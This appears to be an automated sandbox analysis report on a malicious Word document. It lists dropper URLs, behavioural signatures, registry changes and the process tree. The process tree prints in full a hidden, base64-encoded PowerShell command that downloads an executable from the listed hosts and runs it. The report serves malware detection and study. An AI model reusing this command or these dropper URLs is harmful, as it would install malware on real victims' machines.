560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

General

Target

Malware Samples(2).zip
Sample

200101-1dghyjegsn
SHA256

560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://lilikhendarwati.com/wp-admin/JbdTQoQQ/

exe.dropper

http://www.zhangboo.com/wp-admin/lwhcvV/

exe.dropper

http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/

exe.dropper

https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/

exe.dropper

http://apolina.pl/engl/1tuh6ul-gakf89-994/

Signatures

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXEWISPTIS.EXEWISPTIS.EXE

pid process

844 WINWORD.EXE
1276 WISPTIS.EXE
1992 WISPTIS.EXE
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

WINWORD.EXE

pid process

844 WINWORD.EXE
Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 2012 Powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 888 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

888 Powershell.exe

pid	process
844	WINWORD.EXE
1276	WISPTIS.EXE
1992	WISPTIS.EXE

pid	process
844	WINWORD.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	888	2012	Powershell.exe

description	pid	process
Token: SeDebugPrivilege	888	Powershell.exe

pid	process
888	Powershell.exe

Drops file in System32 directory 4 IoCs

Processes:

WINWORD.EXEPowershell.exe

description	ioc	process
File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE

Modifies registry class 144 IoCs

Processes:

description	ioc
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7B03CCD-0CE2-4516-ADF0-644C2A419788}\1.0\FLAGS\ = "4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7B03CCD-0CE2-4516-ADF0-644C2A419788}\1.0\0\win32\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms\\INKEDLib.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{3591F680-E1EB-4584-B938-78FA3B0B74E2}\2.0\FLAGS\ = "6"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3591F680-E1EB-4584-B938-78FA3B0B74E2}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7B03CCD-0CE2-4516-ADF0-644C2A419788}\1.0\HELPDIR\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{3591F680-E1EB-4584-B938-78FA3B0B74E2}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

844 WINWORD.EXE

pid	process
844	WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\VTDL32be68dafd336fa9425b3602fbb4e33e.danger.doc"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Drops file in System32 directory
- Suspicious behavior: AddClipboardFormatListener
PID:844

C:\Windows\SYSTEM32\WISPTIS.EXE
/QuitInfo:0000000000000624;000000000000065C;
1⤵
- Suspicious use of SetWindowsHookEx
PID:1276

C:\Windows\SYSTEM32\WISPTIS.EXE
/QuitInfo:0000000000000624;000000000000065C;
1⤵
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABPAHEAbwBqAHIAcABtAGsAZAB6AGwAZwA9ACcARwBlAHUAcwBjAGsAZgBlAGkAcwBsAGgAJwA7ACQAUwBnAHkAbgBhAGQAdABkAHoAaQAgAD0AIAAnADIAMQA4ACcAOwAkAEYAcwBuAGMAagBmAGIAbgBvAHUAdgBjAHcAPQAnAFYAcgB0AGcAdwBvAGoAaABnAHIAcQBrACcAOwAkAEkAcwB2AGUAZgB0AHMAYwB5AG0AawBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAGcAeQBuAGEAZAB0AGQAegBpACsAJwAuAGUAeABlACcAOwAkAFkAawBqAHoAbQB4AGcAeQBlAGsAcABmAD0AJwBYAGgAaABpAHYAcAB4AHQAbgAnADsAJABQAGQAegB2AGUAdgBiAGgAZQBzAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAGMATABpAEUAbgBUADsAJABNAHYAYwBiAGwAcgBoAGsAegBvAHoAZwA9ACcAaAB0AHQAcABzADoALwAvAGwAaQBsAGkAawBoAGUAbgBkAGEAcgB3AGEAdABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBKAGIAZABUAFEAbwBRAFEALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB6AGgAYQBuAGcAYgBvAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGwAdwBoAGMAdgBWAC8AKgBoAHQAdABwADoALwAvAHQAZQBzAHQALgB3AGkAbgBkAHMAbwByAGgAZQBhAHQAaQBuAGcAYQBuAGQAYQBpAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHIAOQBsAHYALQA0AHQAZQBxADUAZgBmAC0AOAA3ADUAOQA4ADQANgAxADQAMAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AagBhAGMAawBpAGUAagBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AeQBpAHEAcgA0AHIANgBhAC0AZAB3AHQANwBzADAAdQAtADIANgA5ADYANQA4ADcAOAAvACoAaAB0AHQAcAA6AC8ALwBhAHAAbwBsAGkAbgBhAC4AcABsAC8AZQBuAGcAbAAvADEAdAB1AGgANgB1AGwALQBnAGEAawBmADgAOQAtADkAOQA0AC8AJwAuACIAcwBgAHAATABJAFQAIgAoACcAKgAnACkAOwAkAEoAdgBrAGgAawB0AHYAdABzAHEAagA9ACcASwBsAG0AdwBuAGkAcgByACcAOwBmAG8AcgBlAGEAYwBoACgAJABNAHoAbQBxAGIAegBqAHUAZwAgAGkAbgAgACQATQB2AGMAYgBsAHIAaABrAHoAbwB6AGcAKQB7AHQAcgB5AHsAJABQAGQAegB2AGUAdgBiAGgAZQBzAC4AIgBkAG8AYABXAG4AbABgAE8AQQBkAGYASQBMAEUAIgAoACQATQB6AG0AcQBiAHoAagB1AGcALAAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQASwB5AGsAaABvAHMAeABlAD0AJwBKAGMAYwB2AHIAdQByAHQAbQB5ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQAuACIAbABFAG4AYABHAHQAaAAiACAALQBnAGUAIAAzADEANAA1ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAFQAIgAoACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQARAB5AGsAZABhAGcAZQBpAHkAawByAGEAaQA9ACcARwBhAHUAbABuAGEAdABoAGoAcQAnADsAYgByAGUAYQBrADsAJABSAHgAZgBhAHAAdwBjAGcAaQBlAHAAdwA9ACcAQwBsAHMAawB2AGkAdQBmAG0AbABkAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwByAGEAbQB1AG4AbgBrAHMAawBjAGUAPQAnAEQAYgBsAHgAbgB2AHkAaABwAHkAdgB4ACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:888

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/844-0-0x0000000006100000-0x0000000006104000-memory.dmp

Filesize
16KB

Download
memory/844-1-0x00000000061F9000-0x00000000061FD000-memory.dmp

Filesize
16KB

Download
memory/844-2-0x00000000061F9000-0x00000000061FD000-memory.dmp

Filesize
16KB

Download
memory/844-3-0x00000000095A0000-0x00000000095A4000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads